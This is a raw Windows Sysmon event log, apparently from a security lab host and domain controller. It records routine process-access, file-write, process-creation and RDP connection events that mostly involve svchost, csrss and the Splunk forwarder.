11:06:49.256{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219623Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:49.256{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219622Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:49.256{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219621Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:49.256{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219620Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:49.256{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219619Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:49.256{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219618Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:49.256{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219617Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:49.256{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219616Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:49.256{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-1549-6216-CD04-000000003902}1836C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000219615Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:49.256{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1549-6216-CD04-000000003902}1836C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000219614Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:49.257{4F8D34B0-1549-6216-CD04-000000003902}1836C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000219613Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:49.131{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=561FBA7A01CD4A91CDEF233F0CC0B0F0,SHA256=7EBF1414D198E150CAAE3FBC0E2AD1D210A81140D4162479164927A45CDC142C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295487Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:50.669{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48EB2F9DA219EAB68E0F0EE20E485387,SHA256=19A4E258D6985A9C9C97A62C3F698F2D8097A60A4A83AB917210F2A609EE2B7B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219644Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:48.224{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx54168-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000219643Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:50.397{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA212DE25884784451AF8EBA737A8485,SHA256=8BC8DC958AC45BC0E7E26A6C199F58AC31C0BBF2667CCC02EB68507D0A4868F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219642Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:50.272{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=87BCE189B3588BF14FFD024B4D47F02B,SHA256=06395710E42FD35F6E74C21AB160BD2AAAE189912AB4046BAB1D623778BE63D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295488Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:51.685{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59B144B5ABC576BEED61DF18F0437CFA,SHA256=B41FF222003199ADACFDEF8548B03CE414381C3CBA9B1FE71F2606FEED4A002C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219658Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:51.428{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CFEE1EF7A31787B718A57DB2A4C35458,SHA256=194D5EAE9F6645D31ABD493CF1E37EC680C764684B3FE1A49143185FBEAA5627,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000219657Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:51.225{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-154B-6216-CF04-000000003902}1416C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219656Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:51.225{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219655Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:51.225{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219654Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:51.225{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219653Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:51.225{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219652Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:51.225{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219651Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:51.225{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219650Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:51.225{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219649Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:51.225{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219648Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:51.225{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219647Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:51.225{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-154B-6216-CF04-000000003902}1416C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000219646Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:51.225{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-154B-6216-CF04-000000003902}1416C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program 